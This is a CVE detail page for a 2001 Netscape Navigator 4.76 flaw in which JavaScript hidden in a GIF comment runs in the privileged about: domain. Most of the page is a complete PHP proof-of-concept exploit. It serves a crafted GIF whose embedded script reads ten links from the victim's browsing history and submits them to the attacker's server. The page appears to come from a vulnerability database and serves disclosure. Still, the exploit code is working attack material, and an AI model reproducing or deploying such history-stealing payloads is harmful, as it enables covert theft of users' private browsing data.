CVE-2001-0596 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/2637/info Due to a flaw in Navigator's security code, all URLs in the about: protocol are considered to be part of the same domain. If arbitrary Javascript code is placed in a GIF's comment field, it is treated like a normal HTML page. The Javascript code will run from the image information page in the internal about: 'domain'. This issue has also been reported in commented JPEG files. <? /* Netscape 4.76 gif comment flaw Florian Wesch <fw@dividuum.de> http://dividuum.de */ $self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF; if (strlen($self)>64) { echo "Url of $self is too long. 64 maximum.<br>"; echo "You can change this but I think 64 should be enough for anybody ;-)"; exit; } if (!isset($mode)) $mode="intro"; // If urllist is submitted if (isset($u)) $mode="showhist"; switch ($mode) { case "intro": ?> <html> <body> <a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br> </body> </html> <? break; case "frameset": ?> <html> <frameset rows="50%,50%" border=0 frameborder=0 framespacing=0> <frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no> <frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no> </frameset> </html> <? break; case "loadhistory": // replaces the current document with about:global using javascript ?> <html> <base href="about:"> <form action="global" name="loadhistory"> <input type="submit"> </form> <script language="javascript"> document.loadhistory.submit(); </script> </html> <? break; case "showimageinfo": ?> <html> <head> <meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif"> </head> <body> Waiting 5 seconds...<br> <img src="<? echo $self; ?>?mode=evilgif"> </body> </html> <? break; case "evilgif": // Gifs are supposed to be compressed. The program I // used sucks :-) header("Content-type: image/gif"); $gif ="4749463839610a000a00f70000ffffffffffccffff"; $gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6"; $gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933"; $gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f"; $gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff"; $gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff"; $gif.="fffffffffffffffffffffffffffffffffffffffffff"; $gif.="fffffffffffffffffffffffffffffffffffffffffff"; $gif.="fffffffffffffffffffffffffffffffffffffffffff"; $gif.="ffffffffffffffffffffffff0000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="00000000000000021feff"; $gif.=bin2hex(sprintf("%77s%s", /*"<form action=".$self,' target=_parent name=s method=get >'.*/ /* I'm using POST so the submitted urls do not appear in the logfile */ "<form action=".$self,' target=_parent name=s method=post>'. '<input name=u>'. '</form>'. '<script>'. 'f=parent.frames["foo"].document;'. 'l="";'. /*'for(i=0;i<f.links.length;i++)'.*/ 'for(i=0;i<10 ;i++)'. 'l+=f.links[i]+"|";'. 'document.s.u.value=l;'. 'document.'.chr(255).'s.submit();'. '</script>')); $gif.= "00000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="00000000000002c000000000a000a00000813004708"; $gif.="1c48b0a0c18308132a5cc8b061c28000003b"; echo pack("H".strlen($gif), $gif); break; case "showhist": $urls=explode("|",$u); echo "<h1>Top 10 urls in about:global</h1>"; foreach ($urls as $url) { echo "<a href=$url>$url</a><br>"; } }; ?>